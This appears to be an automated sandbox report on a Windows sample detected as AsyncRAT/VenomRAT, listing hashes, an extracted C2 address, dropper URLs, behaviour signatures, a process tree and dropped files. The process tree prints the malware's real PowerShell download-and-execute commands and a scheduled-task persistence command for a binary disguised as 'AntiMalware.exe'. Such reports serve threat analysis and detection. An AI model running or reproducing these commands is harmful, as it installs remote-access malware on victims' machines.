Overview

overview

10

Static

static

10

c8c12055c4...60.exe

windows7-x64

10

c8c12055c4...60.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    132s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-08-2024 19:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe

  • Size

    74KB

  • MD5

    9f7b2bf836c0e9682f7f612fc60d88f9

  • SHA1

    2a99db9697d168488ef962ff51f0599e89bfeaeb

  • SHA256

    c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660

  • SHA512

    59f899ed095371cf13e63ee9748bc8cdc86aa1b2ede5d068dc81f6b0134219fd8f31bfd3f664602cf8562ab4851acdf85f5a06de35ab6f949106139a1ff37556

  • SSDEEP

    1536:i9ZAUZ2HXtkAmLej8CGqPM63JCdNhnY+YH1bo/yUaV4zQX3VclN:i9KUZ82AmLeYoPM63JCnYH1bo9Y4elY

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

94.156.65.172:4449

Mutex

izslwuidilziewad

Attributes
  • delay

    1

  • install

    true

  • install_file

    AntiMalware.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • VenomRAT 2 IoCs

    Detects VenomRAT.

    rat
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
    "C:\Users\Admin\AppData\Local\Temp\c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2036
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\Admin\AppData\Roaming\AntiMalware.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\Admin\AppData\Roaming\AntiMalware.exe"'
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3052
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4BF8.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1480
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:4160
      • C:\Users\Admin\AppData\Roaming\AntiMalware.exe
        "C:\Users\Admin\AppData\Roaming\AntiMalware.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4188
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3884
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3932
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4364
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4848
  • C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    1⤵
      PID:3052
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4180,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=4608 /prefetch:8
      1⤵
        PID:396

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        9ec45c854e161130c24ed3725bd4b422

        SHA1

        605c10e0ecc50d6715701b19838f6003dc926309

        SHA256

        1ac1b7ce31a3815a5cfa99abc19d90f526946c4d584e7fe773b4b82a0be43f03

        SHA512

        64c08d7a1952a1413bd59ad6d614e9ac77b5f68c285eb00ca20da501b0f94a1474a3933fdc5aa49714d2d27d933d04ad6b6a40a80643974fc7a3cbefe8a8fc5a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        b66db53846de4860ca72a3e59b38c544

        SHA1

        2202dc88e9cddea92df4f4e8d83930efd98c9c5a

        SHA256

        b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

        SHA512

        72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d4d9aa0d1f59c308165fcfde8af102ff

        SHA1

        06c80e42d7c81fe712fb01ee00cc4375bd56ef78

        SHA256

        ce8919c2f373fbeb62d6ecae9ab255bbeb265be6f3a8f58716dcafe04fda9ccb

        SHA512

        f0fd85d74956c0b91a1f45a1b66db51032ade95490692b281ca7a21ed44e44acda13eda3fa18288b2d8c7292d4678450754dc2a2177957fac534326953e64aa1

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d2134452566d17919293f4cfc1cc263b

        SHA1

        290ed17a58a2cacff469e804c8c32d92e80c2ad5

        SHA256

        4638b37103e09aa488dfce931f6cb51dd2652c2e7b41df3e58b11286204da1ee

        SHA512

        9bc87044e78fe5bda7baa5072f941bf70dac322d1174cf1a318f5641dd8f230a06d9770ec48873371dba3ef46234c287f660ae7155463f5aa82724198bd2c5e3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        6317adf4fbc43ea2fd68861fafd57155

        SHA1

        6b87c718893c83c6eed2767e8d9cbc6443e31913

        SHA256

        c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

        SHA512

        17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        adf1851e73c5f4c405803b2a1ef43659

        SHA1

        f9802d74e889a48280ac8cebfd77ecabbed5b472

        SHA256

        9276743bad28f3e106ca6d1333990c9b4f5548679ca373488fa33640dcd6e9b0

        SHA512

        9d06d5aee8407698cb44db9883a5bd98ff2c2d97590c5f989744e82e57d3b90e64f2e955b099e1900ad62c50443685f2a6923ee045f1376bf99eef576bdfda1a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        b0cfdab278bf3db6d14817b1e701e4ee

        SHA1

        7ec7d56340dcaff7b6bf3d0e4b35be5bd57e87b8

        SHA256

        0554687e2254846915ac9d734989c77cfc0417bdd6607dd64dde2fb2dcc55854

        SHA512

        40a621b3ef79c9f74c937b4f04ef18bcc78bc7436c2035885bd8651b4ffc072152c6e87087be432c43860256c5e89ef33d57bb27822d36f18b8b9bda9208d4ca

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5el5xlm.iwb.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmp4BF8.tmp.bat
        Filesize

        155B

        MD5

        2ce3f47a4aa578b9671770a08cf4ba37

        SHA1

        ce80ef465b4cb62e9085b0e4f0f9922f1572a61f

        SHA256

        cd8b9186df8297d08653e3b00d19dea51b298dab654fdbb215340935f9894aa8

        SHA512

        76d035d33df5783d8a29022590d2551add4a8541a2496c08f965b3dbe4ce56e3b1a723fd5f4cb23800795d66efb992ac50f99a11bb6b9930a23fdd19df24e355

        Download Submit

      • C:\Users\Admin\AppData\Roaming\AntiMalware.exe
        Filesize

        74KB

        MD5

        9f7b2bf836c0e9682f7f612fc60d88f9

        SHA1

        2a99db9697d168488ef962ff51f0599e89bfeaeb

        SHA256

        c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660

        SHA512

        59f899ed095371cf13e63ee9748bc8cdc86aa1b2ede5d068dc81f6b0134219fd8f31bfd3f664602cf8562ab4851acdf85f5a06de35ab6f949106139a1ff37556

        Download Submit

      • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
        Filesize

        8B

        MD5

        cf759e4c5f14fe3eec41b87ed756cea8

        SHA1

        c27c796bb3c2fac929359563676f4ba1ffada1f5

        SHA256

        c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

        SHA512

        c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

        Download Submit

      • memory/208-19-0x00007FFDE97A0000-0x00007FFDEA261000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/208-16-0x00007FFDE97A0000-0x00007FFDEA261000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/208-15-0x00007FFDE97A0000-0x00007FFDEA261000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/208-4-0x0000016AED4F0000-0x0000016AED512000-memory.dmp

        Filesize

        136KB

        Download

      • memory/208-5-0x00007FFDE97A0000-0x00007FFDEA261000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2200-45-0x00007FFDE97A0000-0x00007FFDEA261000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2200-1-0x0000000000A00000-0x0000000000A16000-memory.dmp

        Filesize

        88KB

        Download

      • memory/2200-3-0x00007FFDE97A0000-0x00007FFDEA261000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2200-0-0x00007FFDE97A3000-0x00007FFDE97A5000-memory.dmp

        Filesize

        8KB

        Download